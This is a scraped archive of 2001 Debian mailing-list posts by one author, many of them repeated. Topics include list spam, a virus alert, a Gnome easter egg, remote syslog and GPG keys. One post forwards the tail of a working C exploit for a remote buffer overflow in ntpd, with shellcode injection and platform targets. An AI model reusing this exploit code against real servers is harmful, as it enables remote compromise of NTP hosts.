Re: SPAM was RE: INSURE GOOD RECEPTION! VITAL EMERGENCY STRATEGY!!!
On Friday 09 November 2001 16:43 pm, Sebastiaan wrote: High, On Fri, 9 Nov 2001, Ed Street wrote: Hey, Is there *anything* we can do about all this Spam that's getting on this list? Wasn't there some rule that commercial mails posted to this list are charged for a couple of thousends $$? Most spam is a commercial ad, so there must be a lot of money going to the Debian project ;-). So who's handling collections? -- Bud Rogers [EMAIL PROTECTED] All things in moderation. And not too much moderation either. -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: SPAM was RE: INSURE GOOD RECEPTION! VITAL EMERGENCY STRATEGY!!!
On Friday 09 November 2001 17:46 pm, Robert Davidson wrote: Wouldn't it just be better if the lists accepted mail from members only, I have always thought so, but whenever that suggestion comes up on any of the debian lists it gets a pretty violent response. -- Bud Rogers [EMAIL PROTECTED] All things in moderation. And not too much moderation either. -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: SPAM was RE: INSURE GOOD RECEPTION! VITAL EMERGENCY STRATEGY!!!
On Friday 09 November 2001 16:43 pm, Sebastiaan wrote: High, On Fri, 9 Nov 2001, Ed Street wrote: Hey, Is there *anything* we can do about all this Spam that's getting on this list? Wasn't there some rule that commercial mails posted to this list are charged for a couple of thousends $$? Most spam is a commercial ad, so there must be a lot of money going to the Debian project ;-). So who's handling collections? -- Bud Rogers [EMAIL PROTECTED] All things in moderation. And not too much moderation either.
Re: SPAM was RE: INSURE GOOD RECEPTION! VITAL EMERGENCY STRATEGY!!!
On Friday 09 November 2001 17:46 pm, Robert Davidson wrote: Wouldn't it just be better if the lists accepted mail from members only, I have always thought so, but whenever that suggestion comes up on any of the debian lists it gets a pretty violent response. -- Bud Rogers [EMAIL PROTECTED] All things in moderation. And not too much moderation either.
Re: [Fwd: Virus found in sent message ´ò¹ú¼Ê³¤Í¾Ã¿·ÖÖÓÖ»Ðè3ëǮ ]
On Sunday 23 September 2001 18:56 pm, WHIRLYCOTT wrote: Looks like someone sent a virus out through the list. My antivirus scanner caught this going through my mail gateway. Just be aware of it. Yep, my ISP's antivirus software caught it too. -- Bud Rogers [EMAIL PROTECTED] They have awakened a sleeping giant and filled him with a terrible resolve. -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: [Fwd: Virus found in sent message ´ò¹ú¼Ê³¤Í¾Ã¿·ÖÖÓÖ»Ðè3ëǮ ]
On Sunday 23 September 2001 18:56 pm, WHIRLYCOTT wrote: Looks like someone sent a virus out through the list. My antivirus scanner caught this going through my mail gateway. Just be aware of it. Yep, my ISP's antivirus software caught it too. -- Bud Rogers [EMAIL PROTECTED] They have awakened a sleeping giant and filled him with a terrible resolve.
Re: HARASS ME MORE.........
On Saturday 01 September 2001 06:48 am, [EMAIL PROTECTED] wrote: On Sat, 1 Sep 2001, [iso-8859-1] Mikaël wrote: Stop beeing a lama and unsuscribe right now. I ASKED YOU MORONS NOT TO SEND ME ANYMORE E-MAIL BUT HERE YOU GO AGAIN. How about sending him some large files in order to have his advice? O:-) I put him in a filter. Every mail I receive from him gets forwarded back to him and to postmaster and abuse at his ISP. I don't think he'll be around long. -- Bud Rogers [EMAIL PROTECTED] http://www.sirinet.net/~budr All things in moderation. And not too much moderation either. -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: HARASS ME MORE.........
On Saturday 01 September 2001 07:45 am, Martin F Krafft wrote: i think all this started because i auto-reply to micro$oft users, telling them about www.vcnet.com/bms and www.unix-vs-nt.org and he didn't like that :) Martin, you may have set him off but I don't think you're responsible. The guy is pretty obviously subscribed to this list. I suppose it's possible that someone else subscribed him without his knowledge or consent, but I doubt it. I think he got himself on the list, for whatever reason, and now he's too stupid to get himself off. -- Bud Rogers [EMAIL PROTECTED] http://www.sirinet.net/~budr All things in moderation. And not too much moderation either. -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: HARASS ME MORE.........
On Saturday 01 September 2001 06:48 am, [EMAIL PROTECTED] wrote: On Sat, 1 Sep 2001, [iso-8859-1] Mikaël wrote: Stop beeing a lama and unsuscribe right now. I ASKED YOU MORONS NOT TO SEND ME ANYMORE E-MAIL BUT HERE YOU GO AGAIN. How about sending him some large files in order to have his advice? O:-) I put him in a filter. Every mail I receive from him gets forwarded back to him and to postmaster and abuse at his ISP. I don't think he'll be around long. -- Bud Rogers [EMAIL PROTECTED] http://www.sirinet.net/~budr All things in moderation. And not too much moderation either.
Re: The unwanted fish...
On Wednesday 15 August 2001 04:08 pm, Martin Fluch wrote: I'm running unstable and (maybe) a month ago I spoted a fish swiming over my desktop from left to right, just a small one, just once. Today again. Does anybody know where this fish is coming from? (I'm a little bit confused, since I have never requested it and have no idea, how this little beast comes on my desktop.) Do you use Gnome? There was a thread not long ago on debian-user I believe about an easter egg in Gnome that occasionally causes a fish to swim across the screen. -- Bud Rogers [EMAIL PROTECTED] http://www.sirinet.net/~budr All things in moderation. And not too much moderation either. -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: The unwanted fish...
On Wednesday 15 August 2001 04:08 pm, Martin Fluch wrote: I'm running unstable and (maybe) a month ago I spoted a fish swiming over my desktop from left to right, just a small one, just once. Today again. Does anybody know where this fish is coming from? (I'm a little bit confused, since I have never requested it and have no idea, how this little beast comes on my desktop.) Do you use Gnome? There was a thread not long ago on debian-user I believe about an easter egg in Gnome that occasionally causes a fish to swim across the screen. -- Bud Rogers [EMAIL PROTECTED] http://www.sirinet.net/~budr All things in moderation. And not too much moderation either.
Re: The unwanted fish...
On Wednesday 15 August 2001 04:08 pm, Martin Fluch wrote: I'm running unstable and (maybe) a month ago I spoted a fish swiming over my desktop from left to right, just a small one, just once. Today again. Does anybody know where this fish is coming from? (I'm a little bit confused, since I have never requested it and have no idea, how this little beast comes on my desktop.) http://lists.debian.org/debian-user/2001/debian-user-200108/msg02333.html -- Bud Rogers [EMAIL PROTECTED] http://www.sirinet.net/~budr All things in moderation. And not too much moderation either.
Re: Remote Logging
On Sunday 22 April 2001 11:01, Philipp Schulte wrote: Hello, I would like to use the remote logging from syslogd to have copies of the logfiles from about six servers on one special server. Is it possible to use this syslogd-feature in such a way that several logfiles on the log-server are created? For example: syslog.host1, syslog.host2, syslog.host3 I don't think you can do that with stock syslogd. Based on a quick tour of the homepage, it looks like syslog-ng might do what you want. I haven't tried it, mind you, but the comments on freshmeat seem pretty favorable. http://freshmeat.net/projects/syslog-ng/ http://www.balabit.hu/en/products/syslog-ng/ -- Bud Rogers [EMAIL PROTECTED] http://www.sirinet.net/~budr All things in moderation. And not too much moderation either. -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: Remote Logging
On Sunday 22 April 2001 11:01, Philipp Schulte wrote: Hello, I would like to use the remote logging from syslogd to have copies of the logfiles from about six servers on one special server. Is it possible to use this syslogd-feature in such a way that several logfiles on the log-server are created? For example: syslog.host1, syslog.host2, syslog.host3 I don't think you can do that with stock syslogd. Based on a quick tour of the homepage, it looks like syslog-ng might do what you want. I haven't tried it, mind you, but the comments on freshmeat seem pretty favorable. http://freshmeat.net/projects/syslog-ng/ http://www.balabit.hu/en/products/syslog-ng/ -- Bud Rogers [EMAIL PROTECTED] http://www.sirinet.net/~budr All things in moderation. And not too much moderation either.
Re: [venglin@FREEBSD.LUBLIN.PL: ntpd = 4.0.99k remote buffer overflow]
(socket); return -1; } if((connect(sockfd, (struct sockaddr *)sa, sizeof(sa))) 0) { perror(connect); close(sockfd); return -1; } memset(buf, NOP, PKTSIZ); memcpy(buf, q2, sizeof(q2)); p = buf + align; ap = (unsigned long *)p; for(i=0;iADDRS/4;i++) *ap++ = ret; p = (char *)ap; memcpy(buf+shalign, shellcode, strlen(shellcode)); if((write(sockfd, buf, PKTSIZ)) 0) { perror(write); close(sockfd); return -1; } fprintf(stderr, [1] - evil query (pkt = %d | shell = %d)\n, PKTSIZ, strlen(shellcode)); fflush(stderr); if ((write(sockfd, q3, sizeof(q3))) 0) { perror(write); close(sockfd); return -1; } fprintf(stderr, [2] - null query (pkt = %d)\n, sizeof(q3)); fflush(stderr); close(sockfd); return 0; } int main(argc, argv) int argc; char **argv; { extern int optind, opterr; extern char *optarg; int ch, type, ofs, i; long ret; opterr = ofs = 0; type = -1; while ((ch = getopt(argc, argv, t:o:)) != -1) switch((char)ch) { case 't': type = atoi(optarg); break; case 'o': ofs = atoi(optarg); break; case '?': default: puts(usage); exit(0); } argc -= optind; argv += optind; fprintf(stderr, ntpdx v1.0 by [EMAIL PROTECTED]); if (type 0) { fprintf(stderr, Please select platform:\n); for (i=0;targ[i].os;i++) { fprintf(stderr, \t-t %d : %s %s (%p)\n, i, targ[i].os, targ[i].version, (void *)targ[i].ret); } exit(0); } fprintf(stderr, Selected platform: %s with ntpd %s\n\n, targ[type].os, targ[type].version); ret = targ[type].ret; ret += ofs; if (argc != 1) { puts(usage); exit(0); } fprintf(stderr, RET: %p / Align: %d / Sh-align: %d / sending query\n, (void *)ret, targ[type].align, targ[type].shalign); if (doquery(*argv, ret, targ[type].code, targ[type].align, targ[type].shalign) 0) { fprintf(stderr, Failed.\n); exit(1); } fprintf(stderr, Done.\n); if (!targ[type].port) { fprintf(stderr, /tmp/sh was spawned.\n); exit(0); } exit(0); } -- * Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NIC-HDL: PMF9-RIPE * * Inet: [EMAIL PROTECTED] ** PGP: D48684904685DF43EA93AFA13BE170BF * - End forwarded message - Content-Type: application/pgp-signature; charset=us-ascii; name=Attachment: 1 Content-Transfer-Encoding: 7bit Content-Description: -- Bud Rogers [EMAIL PROTECTED] http://www.sirinet.net/~budr All things in moderation. And not too much moderation either.
Re: Apt-get package verification
On Saturday 10 February 2001 12:54, Carel Fellinger wrote: On Sat, Feb 10, 2001 at 06:11:01PM +0100, marcoghidinelli wrote: ... for the debian-developer keys: apt-get install debian-keyring I've done this some time ago, but now I get: [-- PGP output follows (current time: Sat Feb 10 19:40:06 2001) --] gpg: Signature made Sat 10 Feb 2001 06:11:01 PM CET using DSA key ID EBF15399 gpg: Good signature from "Marco Ghidinelli [EMAIL PROTECTED]" gpg: WARNING: This key is not certified with a trusted signature! gpg: There is no indication that the signature belongs to the owner. gpg: Fingerprint: 1C34 97F7 1837 D525 7E3F C883 B572 DF1A EBF1 5399 [-- End of PGP output --] I have the same problem with Martin Schulze's sigs. I've retrieved the debian keyring from the website and from my CD, I've manually retrieved his key from public keyservers and from the debian website All the fingerprints match. I've signed his key on my keyring. I even tried giving it full trust. His sigs are still flagged as bad here. What have I missed? -- Bud Rogers [EMAIL PROTECTED] http://www.sirinet.net/~budr/zamm.html All things in moderation. And not too much moderation either. -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: Apt-get package verification
On Saturday 10 February 2001 12:54, Carel Fellinger wrote: On Sat, Feb 10, 2001 at 06:11:01PM +0100, marcoghidinelli wrote: ... for the debian-developer keys: apt-get install debian-keyring I've done this some time ago, but now I get: [-- PGP output follows (current time: Sat Feb 10 19:40:06 2001) --] gpg: Signature made Sat 10 Feb 2001 06:11:01 PM CET using DSA key ID EBF15399 gpg: Good signature from Marco Ghidinelli [EMAIL PROTECTED] gpg: WARNING: This key is not certified with a trusted signature! gpg: There is no indication that the signature belongs to the owner. gpg: Fingerprint: 1C34 97F7 1837 D525 7E3F C883 B572 DF1A EBF1 5399 [-- End of PGP output --] I have the same problem with Martin Schulze's sigs. I've retrieved the debian keyring from the website and from my CD, I've manually retrieved his key from public keyservers and from the debian website All the fingerprints match. I've signed his key on my keyring. I even tried giving it full trust. His sigs are still flagged as bad here. What have I missed? -- Bud Rogers [EMAIL PROTECTED] http://www.sirinet.net/~budr/zamm.html All things in moderation. And not too much moderation either.
Is Open Source software really more secure?
I've always taken for granted the idea that open source was inherently more secure because it's open to peer review. Linus said Given enough eyes, all bugs are shallow. But has anyone ever done a serious study on the subject? I've seen plenty of emotional arguments and anecdotal evidence, but nothing that I would consider hard evidence. I'm doing a paper on this topic for a graduate level class in Information Assurance Management. I'm looking for background material for my paper. I would appreciate any pointers, urls, etc. -- Bud Rogers [EMAIL PROTECTED]